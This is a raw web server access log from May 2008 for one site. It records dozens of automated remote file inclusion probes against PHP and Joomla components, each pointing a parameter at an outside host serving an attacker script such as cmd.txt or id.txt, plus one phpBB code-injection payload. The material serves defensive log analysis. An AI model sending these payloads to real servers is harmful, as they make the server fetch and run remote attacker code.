218.38.12.93 - - [06/May/2008:12:33:41 -0700] "GET /logs/index.php?incl=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:33:47 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:12:33:47 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:33:47 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:33:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:12:33:48 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:12:33:49 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:12:33:50 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:12:33:50 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [06/May/2008:12:33:51 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:33:54 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:34:00 -0700] "GET /logs/homepage.php?sel=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:34:00 -0700] "GET /homepage.php?sel=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:34:05 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:34:07 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:12:34:09 -0700] "GET /logs/access.log/index.php?incl=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:18 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:18 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:19 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:21 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:21 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:21 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:12:34:21 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:21 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:12:34:21 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:12:34:21 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:21 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:21 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:23 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:23 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:23 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:23 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:23 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:34:23 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:12:34:45 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:12:34:46 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:12:34:46 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:12:34:59 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.51 - - [06/May/2008:12:35:00 -0700] "GET /logs/access_080213.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:12:35:00 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:12:35:00 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:35:19 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:35:19 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:35:36 -0700] "GET /logs/homepage.php?sel=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:35:36 -0700] "GET /homepage.php?sel=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.226.179.98 - - [06/May/2008:12:36:06 -0700] "GET /blank.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:36:17 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:36:17 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:23 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:23 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:23 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:24 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:24 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:24 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:24 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:24 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:36:24 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:36:44 -0700] "GET /logs/access_080201.log//modify.php?dir_module=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:12:36:52 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:12:36:52 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:12:36:53 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:12:37:18 -0700] "GET /logs/access_080124.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:12:37:18 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:12:37:18 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.211.161.41 - - [06/May/2008:12:37:36 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.211.161.41 - - [06/May/2008:12:37:37 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:38:14 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:12:38:18 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:12:38:18 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.9.119 - - [06/May/2008:12:38:18 -0700] "GET /bikes/cb750K6/?N=D HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:38:18 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:12:38:19 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:12:38:19 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:38:22 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.162.119 - - [06/May/2008:12:38:22 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.76.13.95 - - [06/May/2008:12:38:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:12:38:32 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:12:38:38 -0700] "GET /logs/access_071225.log/admin.php?page=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:39:25 -0700] "GET /logs/access_080204.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:39:27 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:39:27 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:39:32 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.7.198.92 - - [06/May/2008:12:39:35 -0700] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://qsystemsonline.biz/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "dmulk.com"
83.189.175.160 - - [06/May/2008:12:39:36 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:12:39:45 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:12:40:21 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:40:23 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:40:43 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:40:43 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:40:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:40:56 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:40:57 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:40:58 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.124.203.142 - - [06/May/2008:12:41:00 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:12:41:16 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:12:41:16 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:41:31 -0700] "GET /logs//index.php?configFile=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:41:32 -0700] "GET //index.php?configFile=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:12:41:49 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:12:42:06 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [06/May/2008:12:42:06 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:12:42:11 -0700] "GET /logs/access_080118.log/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:12:42:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/agung_skater/agung.html?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [06/May/2008:12:42:55 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [06/May/2008:12:42:56 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [06/May/2008:12:42:57 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.72 - - [06/May/2008:12:43:21 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [06/May/2008:12:43:21 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:43:31 -0700] "GET //plugins/payment/theinternetcommerce/theinternetcommerce.inc.php?config[root_dir]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:31 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:31 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:32 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:32 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:32 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:43:32 -0700] "GET /logs//plugins/payment/theinternetcommerce/theinternetcommerce.inc.php?config[root_dir]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:32 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:34 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:34 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:34 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:34 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:35 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:35 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:37 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:37 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:37 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:38 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:38 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:38 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:38 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:39 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:39 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:39 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:39 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:40 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:40 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
